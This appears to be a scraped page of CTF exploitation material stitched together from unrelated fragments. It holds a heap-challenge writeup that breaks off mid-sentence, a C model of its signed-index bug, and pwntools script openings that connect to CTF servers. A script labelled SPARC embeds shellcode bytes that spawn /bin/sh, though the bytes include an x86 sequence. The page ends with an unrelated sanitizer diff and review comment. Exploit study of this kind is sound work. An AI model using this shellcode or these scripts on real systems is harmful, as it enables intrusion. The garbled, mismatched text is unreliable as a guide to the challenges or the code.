Faith (farazsth98): Looking for zero days
# Writeup at https://faraz.faith/2020-11-23-dragonctf-bitmapmanager/
# Credits to https://twitter.com/RBTree_
import struct
from pwn import *

def make_image(length, check):
    # Build the start of a BMP file header: 2-byte signature, 4-byte
    # little-endian file size, then 4 reserved bytes that must be zero.
    # The gist is cut off here; the rest of the header and the use of
    # `check` are not shown in this listing.
    t = b"BM"                        # signature
    t += struct.pack("<I", length)   # file size
    t += b'\x00' * 4                 # reserved, has to be 0
    return t

Functionality

At the beginning, the binary lets you enter 0x20 bytes for your name. This is stored in the bss section and is not null terminated. After this, you get the following menu options:

  1. Show Name - Shows you your name
  2. Write Diary - Lets you allocate a page of at most 0x80 bytes. The first four bytes of the page chunk store the size you chose, and the rest is the content you enter. calloc is used to allocate this chunk. The chunk's pointer is stored in an array immediately after your name in the bss section (so if your name fills all 0x20 bytes, option 1 prints past it and leaks the first page pointer). You can have at most 14 pages.
  3. Read Diary - Lets you pick a page index; the corresponding page contents are output to you (using puts).
  4. Edit Diary - Lets you pick a page index to edit. It uses the size stored in the first 4 bytes of the page chunk to determine how many bytes you can edit. The page index you enter is signed, so there is a bug here (you can enter negative
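As an added illustration (not code from the gist, the writeup or the challenge binary), the C model below reproduces the layout and checks this section describes: a 0x20-byte name with no terminator followed directly by the page-pointer array, calloc'd page chunks whose first four bytes hold the chosen size, and an index check that only tests the upper bound. The struct, the function names and the test name are assumptions made for the example; the real binary's symbols are not shown on the page. The hardened check is placed next to the vulnerable one, and `slot_offset_from_name` shows which name bytes a negative index turns into a "page pointer".

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_LEN  0x20
#define MAX_PAGES 14
#define MAX_PAGE  0x80

/* Assumed model of the bss layout described in the writeup: a 0x20-byte
 * name with no terminator, immediately followed by the page pointers. */
struct diary_bss {
    char  name[NAME_LEN];
    char *pages[MAX_PAGES];
};
static struct diary_bss g;
static int g_page_count;

/* Name entry: copies at most 0x20 bytes and never appends a NUL, so a
 * full-length name runs straight into pages[0] when printed with puts. */
int set_name(const char *s)
{
    size_t n = 0;
    while (n < NAME_LEN && s[n] != '\0')
        n++;
    memset(g.name, 0, NAME_LEN);
    memcpy(g.name, s, n);
    return (int)n;
}

/* Write Diary: one calloc'd chunk of `size` bytes (max 0x80); the size is
 * stored in the first four bytes, the content after it. Returns the index. */
int write_diary(uint32_t size, const char *content)
{
    if (g_page_count >= MAX_PAGES || size < 4 || size > MAX_PAGE)
        return -1;
    char *chunk = calloc(1, size);
    if (chunk == NULL)
        return -1;
    memcpy(chunk, &size, sizeof size);      /* header read later by Edit Diary */
    size_t n = strlen(content);
    if (n > size - 4)
        n = size - 4;
    memcpy(chunk + 4, content, n);          /* rest stays zero from calloc */
    g.pages[g_page_count] = chunk;
    return g_page_count++;
}

/* Index check as the writeup describes it: the index is signed and only the
 * upper bound is tested, so every negative value passes. */
int index_ok_vuln(int idx)
{
    return idx < g_page_count;
}

/* Hardened check: reject negatives as well as indexes past the live pages. */
int index_ok_fixed(int idx)
{
    return idx >= 0 && idx < g_page_count;
}

/* Byte offset, from the start of the name, of the slot pages[idx] is read
 * from. For idx in -4..-1 the slot lies inside the name buffer, so the
 * "page pointer" Read/Edit Diary dereferences is attacker-chosen name bytes.
 * The arithmetic stays inside the single object g, so it is well defined. */
long slot_offset_from_name(int idx)
{
    char *slot = (char *)g.pages + (long)idx * (long)sizeof(char *);
    return (long)(slot - g.name);
}

/* Edit Diary: the editable length comes from the chunk's own 4-byte header. */
uint32_t edit_limit(int idx)
{
    uint32_t stored;
    memcpy(&stored, g.pages[idx], sizeof stored);
    return stored - 4;
}

int main(void)
{
    /* Constructed input: exactly 0x20 'A's, so no NUL lands in the name. */
    set_name("AAAAAAAA" "AAAAAAAA" "AAAAAAAA" "AAAAAAAA");
    int idx = write_diary(0x80, "hello diary");
    printf("page %d: %u editable bytes\n", idx, edit_limit(idx));
    for (int i = -4; i < 0; i++)
        printf("pages[%d] read from name+0x%lx, vuln check=%d, fixed check=%d\n",
               i, slot_offset_from_name(i), index_ok_vuln(i), index_ok_fixed(i));
    return 0;
}
```

With one page allocated, indexes -1 through -4 pass the original check and resolve to offsets 0x18, 0x10, 0x08 and 0x00 inside the name, which is exactly the region the user fills with Show Name's input; the fixed check rejects all of them.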
#!/usr/bin/env python3
from pwn import *
elf = ELF("./shadowstuck")
libc = ELF("./libc-2.31.so")
#p = process("./shadowstuck", env={"LD_PRELOAD": "./libc-2.31.so"})
p = remote("challenges.ctf.kaf.sh", 8000)
'''
farazsth98 / secret_pwnhub_academy_rewards_club_2.py
Created October 26, 2020 10:04
Secret Pwnhub Academy Awards Club 2 exploit script from Hack.lu CTF 2020 (ugly)
#!/usr/bin/env python3
from pwn import *
context.arch = "sparc"
elf = ELF("./sparc-2")
p = remote("flu.xxx", 2025)
shellcode = b"AA\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10\xc0\x23\xbf\xec\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a\x82\x10\x20\x3b\x91\xd0\x20\x08\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
diff --git a/sanitizers.c b/sanitizers.c
index 78d8fafc..1c905d97 100644
--- a/sanitizers.c
+++ b/sanitizers.c
@@ -23,7 +23,6 @@
"symbolize=1:" \
"detect_leaks=0:" \
"disable_coredump=0:" \
- "detect_odr_violation=0:" \
"allocator_may_return_null=1:" \
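Review bot: Dropping "detect_odr_violation=0:" from this option string silently switches targets to ASan's default ODR checking, which reports an error at load time whenever the same global is defined in more than one loaded object (for example a target that links two copies of a library), so such targets will now die before a single input is executed. If that is the intent, say so in the commit message or in a comment beside this list, and consider leaving a documented way to opt out (e.g. letting an environment-supplied ASAN_OPTIONS override this default) rather than removing the line outright.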